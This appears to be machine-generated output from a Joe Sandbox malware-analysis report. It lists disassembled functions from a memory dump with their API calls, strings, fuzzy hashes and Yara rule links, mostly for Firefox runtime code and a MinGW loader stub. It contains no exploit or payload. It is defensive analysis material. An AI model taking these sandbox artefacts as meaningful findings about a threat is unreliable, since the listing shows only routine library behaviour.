Instruction ID: 56ed1a1595fa0fb892f07542593b69e916ecdcfde4143a45e0097add512d4068
Opcode Fuzzy Hash: 16ae2b1055eb38f81ce3d30f89a238db3d89389b8dbff49a3b3960edf5dcdaeb
Instruction Fuzzy Hash: D771E2B0A047469FCB08DF68D450B6EBBB1FF85300F45466DD9198BB41DB70AA94CBE2

Function 6D590180 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 151threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6D5902E9
AcquireSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D5902F6
ReleaseSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D59033A

Strings

about:blank, xrefs: 6D59020F

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread
String ID: about:blank
API String ID: 135963836-258612819
Opcode ID: 857e5e241934fa2b55f3e2b7eb63d150dc97f3b86ab0e099cb3b03c5e2b8db8b
Instruction ID: fa758d19cafb0d7ac573793020390b887341abc02a5138272665f51493cc845d
Opcode Fuzzy Hash: 857e5e241934fa2b55f3e2b7eb63d150dc97f3b86ab0e099cb3b03c5e2b8db8b
Instruction Fuzzy Hash: FD51BF7490061ACFCF08DF59C880A6AB7F5FF89324F52491AD919ABB41D731BD42CB91

Function 6D56D468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6D57CBE8: GetCurrentProcess.KERNEL32(?,6D5431A7), ref: 6D57CBF1
Part of subcall function 6D57CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6D5431A7), ref: 6D57CBFA

EnterCriticalSection.KERNEL32(6D5CE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6D57D1C5), ref: 6D56D4F2
LeaveCriticalSection.KERNEL32(6D5CE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6D57D1C5), ref: 6D56D50B

Part of subcall function 6D54CFE0: EnterCriticalSection.KERNEL32(6D5CE784), ref: 6D54CFF6
Part of subcall function 6D54CFE0: LeaveCriticalSection.KERNEL32(6D5CE784), ref: 6D54D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6D57D1C5), ref: 6D56D52E
EnterCriticalSection.KERNEL32(6D5CE7DC), ref: 6D56D690
LeaveCriticalSection.KERNEL32(6D5CE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6D57D1C5), ref: 6D56D751

Strings

MOZ_CRASH(), xrefs: 6D56D4BB

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: 291b65899b6c2b00088018ee1f8c1298ffb9967918293e406846c11c04080cb0
Instruction ID: 3c1146a24cbed8b5beeed0af237ebb5f14e5418a0051a34351fdf0704fbf5695
Opcode Fuzzy Hash: 291b65899b6c2b00088018ee1f8c1298ffb9967918293e406846c11c04080cb0
Instruction Fuzzy Hash: 0751B471A04B818FD728CF68C09472AB7E1EBC9714F654D2EE6A9C7E55DB70A800CB52

Function 6D54ECD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6D54F100: LoadLibraryW.KERNEL32(shell32,?,6D5BD020), ref: 6D54F122
Part of subcall function 6D54F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6D54F132

Part of subcall function 6D54EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6D57D7F3), ref: 6D54EBC3
Part of subcall function 6D54EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6D57D7F3), ref: 6D54EBD6

wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D54EDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6D54EDCC
CreateFileW.KERNEL32 ref: 6D54EE08

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6D54EDC1

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: Filewcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 753190367-344433685
Opcode ID: 30c26794f8cb04df65a5237ceff4cee990eb7581a733c14af384e822282b35ed
Instruction ID: 3b9461fba8a95d3b0673879efc7d5113702aac44285c2e8af98753a41553e177
Opcode Fuzzy Hash: 30c26794f8cb04df65a5237ceff4cee990eb7581a733c14af384e822282b35ed
Instruction Fuzzy Hash: 6B51D271D083058BDB09DF68C8417BEB7B0AF99318F45C82DE855ABA41E7306D94C7A3

Function 6D594630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6D594721

Strings

-%llu, xrefs: 6D594733
., xrefs: 6D59476A
profiler-paused, xrefs: 6D5946E4

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: __aulldiv
String ID: -%llu$.$profiler-paused
API String ID: 3732870572-2661126502
Opcode ID: ba04f5a9948809342a73ba6642f4a7b9a7d742b29db602f07d1d0b8554606ddd
Instruction ID: 1f81d4fc1f99dc000446928f797ceb52051825811a6a8f171c222325df4867e4
Opcode Fuzzy Hash: ba04f5a9948809342a73ba6642f4a7b9a7d742b29db602f07d1d0b8554606ddd
Instruction Fuzzy Hash: 2C412571A087489BCB0CCF78D85116EBBE5ABC9644F118A3EF965ABB41EB309C418746

Function 6D5946E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6D594721

Part of subcall function 6D544410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6D583EBD,00000017,?,00000000,?,6D583EBD,?,?,6D5442D2), ref: 6D544444

Strings

-%llu, xrefs: 6D594733
., xrefs: 6D59476A
profiler-paused, xrefs: 6D5946E4

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: __aulldiv__stdio_common_vsprintf
String ID: -%llu$.$profiler-paused
API String ID: 680628322-2661126502
Opcode ID: 0fcbc668dc9b4d3215949feafdd5287856442e0fc71fd8b2f8bc0430631b7a01
Instruction ID: 097351cb2d083338878de25b46c63b062060fc8623275c115f17ba357b2a2c31
Opcode Fuzzy Hash: 0fcbc668dc9b4d3215949feafdd5287856442e0fc71fd8b2f8bc0430631b7a01
Instruction Fuzzy Hash: 8A312471F042485BCB0CCF6CD8906AEBBE6EB88314F15853EE9159BB81EB709D018B95

Function 6D59B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6D544290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6D583EBD,6D583EBD,00000000), ref: 6D5442A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6D59B127), ref: 6D59B463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6D59B4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6D59B4E4

Strings

pid:, xrefs: 6D59B4DE

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: d85c2ff5efcc5945302093664b555e7d5a360d37b49e0e03636ff082df2b5d4d
Instruction ID: 7a93e57dd4c3cd9a0763a0f5858a1ae52c73272f434fef6b57a68b860e6f948c
Opcode Fuzzy Hash: d85c2ff5efcc5945302093664b555e7d5a360d37b49e0e03636ff082df2b5d4d
Instruction Fuzzy Hash: EF311631A00249DFEB18EFA8D8C0AAEB7B6FF45314F45082DD9056BA41E731A945CBE1

Function 6D5A76C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 6D5A76F2
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6D5A7717
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6D5A778F,00000000,00000000,00000000,00000000), ref: 6D5A7731

Strings

}>Xm, xrefs: 6D5A76C4

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: ByteCharMultiWide$memset
String ID: }>Xm
API String ID: 1216362210-3615860094
Opcode ID: 3a6ecb56f15e42e64944171b6346540124c49824e3531dd9e5601a3e57f7775d
Instruction ID: 922815f097347eee50c1df8fab4fd95ed5ea288ce20f24bfa496ee7ca4f0856a
Opcode Fuzzy Hash: 3a6ecb56f15e42e64944171b6346540124c49824e3531dd9e5601a3e57f7775d
Instruction Fuzzy Hash: E211B6B2D042256BDB10AF758C44B7FBEE8EF45354F054829F94897200E7718C408BE2

Function 6D55BF00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6D5A7A3F), ref: 6D55BF11
?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6D5A7A3F), ref: 6D55BF5D
??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6D5A7A3F), ref: 6D55BF7E

Strings

[m, xrefs: 6D55BF84

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@?init@?$basic_ios@D@std@@@2@_V?$basic_streambuf@
String ID: [m
API String ID: 4279176481-4264648302
Opcode ID: 3e2e58c85285c9fe24bbd0a9ee3709125b55547ceef12b2bbcdd3aff21c82de9
Instruction ID: 780a0ce446f59051bb967a173a2c89d65f3bd201a42440507aabf25026423b2b
Opcode Fuzzy Hash: 3e2e58c85285c9fe24bbd0a9ee3709125b55547ceef12b2bbcdd3aff21c82de9
Instruction Fuzzy Hash: 30119374201A048FD729CF1CD598A2AFBF8FF59305355885DE98A8BB55C731A804CF51

Function 6D54F100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(shell32,?,6D5BD020), ref: 6D54F122
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6D54F132

Strings

SHGetKnownFolderPath, xrefs: 6D54F12C
shell32, xrefs: 6D54F11D

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetKnownFolderPath$shell32
API String ID: 2574300362-1045111711
Opcode ID: 4d8ec7c9f558dcdf6f08db208e554507bf042e1e4852fb867fb34d9b8ca2dddf
Instruction ID: 7c4287be751f37bb4388d4397058712d946d05a0654b35d987ee1486e948e8d1
Opcode Fuzzy Hash: 4d8ec7c9f558dcdf6f08db208e554507bf042e1e4852fb867fb34d9b8ca2dddf
Instruction Fuzzy Hash: E401717160421A9FDF049F69DC48A6B7BF8FF4A751B41441DF949E7600E730A900CBA1

Function 6D58E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6D58E577
AcquireSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58E584
ReleaseSRWLockExclusive.KERNEL32(6D5CF4B8), ref: 6D58E5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6D58E8A6

Strings

MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6D58E777
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6D58E655
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6D58E826, 6D58E850
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6D58E722, 6D58E750, 6D58E7A2
MOZ_PROFILER_STARTUP, xrefs: 6D58E5A1, 6D58E5CC, 6D58E5FF, 6D58E62A

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: d207a8f913e956742fcc66cea96e9ca0126b1ada943c9e4588ff447edd727ba5
Instruction ID: 6f100ffe3e0b9bcf8dd33d6244bc12e9c895169f39bd4a145d3d529b1a518cd6
Opcode Fuzzy Hash: d207a8f913e956742fcc66cea96e9ca0126b1ada943c9e4588ff447edd727ba5
Instruction Fuzzy Hash: EB110031904A58DFCF00AF58C888B6EBBF4FB89729F02051DE85587A41D774A844CF92

Function 61E01440 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 61E01456
GetProcAddress.KERNEL32 ref: 61E01471

Strings

libgcj-16.dll, xrefs: 61E0144F
_Jv_RegisterClasses, xrefs: 61E01466

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: _Jv_RegisterClasses$libgcj-16.dll
API String ID: 1646373207-328863460
Opcode ID: 659acb1d45e1fe859de50aa712dc5e6a1f27a03cf8697e99cf940ea6467707a5
Instruction ID: ecefe885db533eab1004145bf0edfd2de441c317d2227bbbfd891c436449bb9f
Opcode Fuzzy Hash: 659acb1d45e1fe859de50aa712dc5e6a1f27a03cf8697e99cf940ea6467707a5
Instruction Fuzzy Hash: CBE06DB4914B029BEB017FF4850633EBAF5AFC570AF72C42CD4808A290EA30C4818763

Function 61E40BB5 Relevance: 6.4, APIs: 5, Instructions: 106COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E40C37
memcmp.MSVCRT ref: 61E40C5C
memcmp.MSVCRT ref: 61E40C86
memcmp.MSVCRT ref: 61E40CB5
memcmp.MSVCRT ref: 61E40CE1

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697726963.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697822264.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697918067.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3698534601.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_61e00000_6523f73121.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 8cc521fb16cdd100886a572f5b312f8a70bae0a598922c27761b03018ed4fb84
Instruction ID: fd79a925e1d847c1357e69ee8e74f21d123acc92255d85b94bee504056160bb0
Opcode Fuzzy Hash: 8cc521fb16cdd100886a572f5b312f8a70bae0a598922c27761b03018ed4fb84
Instruction Fuzzy Hash: C0414EB0A083058BE7049FA9D68439EBAF5EFD5358F25C83DE898CB384D775D4458B42

Function 6D599120 Relevance: 6.3, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6D598242,?,00000000,?,6D58B63F), ref: 6D599188
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6D598242,?,00000000,?,6D58B63F), ref: 6D5991BB
memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,6D598242,?,00000000,?,6D58B63F), ref: 6D5991EB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6D598242,?,00000000,?,6D58B63F), ref: 6D599200
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6D598242,?,00000000,?,6D58B63F), ref: 6D599219

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 0f9a957dde91de1492bb2ecb5156a1700bb384813d0487f0ed2ec1b18af28167
Instruction ID: f45402ea4c53237edf98ab309a28a8f44490902f77335b69f633882c8630ccea
Opcode Fuzzy Hash: 0f9a957dde91de1492bb2ecb5156a1700bb384813d0487f0ed2ec1b18af28167
Instruction Fuzzy Hash: D231F131A006068FEF18CF68DC4576E73B9FF85701F418A29D85ADB640EB31E955CBA1

Function 6D5884E0 Relevance: 6.3, APIs: 5, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6D5884F3

Part of subcall function 6D587670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6D5885B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6D58767F
Part of subcall function 6D587670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6D5885B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6D587693
Part of subcall function 6D587670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6D5885B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6D5876A7

Part of subcall function 6D565E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6D565EDB
Part of subcall function 6D565E90: memset.VCRUNTIME140(ewZm,000000E5,?), ref: 6D565F27
Part of subcall function 6D565E90: LeaveCriticalSection.KERNEL32(?), ref: 6D565FB2

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6D58850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6D58851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6D58855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6D58856F

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: free$CriticalSection$EnterLeavememset
String ID:
API String ID: 3977402767-0
Opcode ID: fc76de43c7c32bad3e883aa354cd4b8f416b976f61600e3e5c78c5dd0bf10dab
Instruction ID: bed2749a95d45df04022603d3d363b26022ae7fa23ef5acbadf87613e8cae0c3
Opcode Fuzzy Hash: fc76de43c7c32bad3e883aa354cd4b8f416b976f61600e3e5c78c5dd0bf10dab
Instruction Fuzzy Hash: 82217174200602AFDF18DB29D888B6A7BB5FF84309F15482CE55B87B42DB31F945CB52

Function 6D580800 Relevance: 6.3, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6D5CE7DC), ref: 6D580838
memset.VCRUNTIME140(?,00000000,00000158), ref: 6D58084C
EnterCriticalSection.KERNEL32(?), ref: 6D5808AF
LeaveCriticalSection.KERNEL32(?), ref: 6D5808BD
LeaveCriticalSection.KERNEL32(6D5CE7DC), ref: 6D5808D5

Memory Dump Source

Source File: 00000009.00000002.3698893380.000000006D541000.00000020.00000001.01000000.00000020.sdmp, Offset: 6D540000, based on PE: true

Associated: 00000009.00000002.3698744202.000000006D540000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699661165.000000006D5CE000.00000004.00000001.01000000.00000020.sdmpDownload File
Associated: 00000009.00000002.3699896357.000000006D5D2000.00000002.00000001.01000000.00000020.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6d540000_6523f73121.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset
String ID:
API String ID: 837921583-0
Opcode ID: b93693e10dcedc5164f61f9826e99eb2d653d5a46c63f78b7af200fad86f3411
Instruction ID: 100a5ff67f07f0e1af6cb103af0237b4997cb24bfb3e6683de04dd35027972aa
Opcode Fuzzy Hash: b93693e10dcedc5164f61f9826e99eb2d653d5a46c63f78b7af200fad86f3411
Instruction Fuzzy Hash: 35210430B0561A8BEF08DF6AC845BBE73B9BF85704F41052DD909E7A02DB35A944CF91

Function 61E3D021 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 293stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 61E3D129

Strings

-, xrefs: 61E3D2AF
], xrefs: 61E3D302
#, xrefs: 61E3D24E

Memory Dump Source

Source File: 00000009.00000002.3697149386.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000009.00000002.3695997989.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3697489419.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
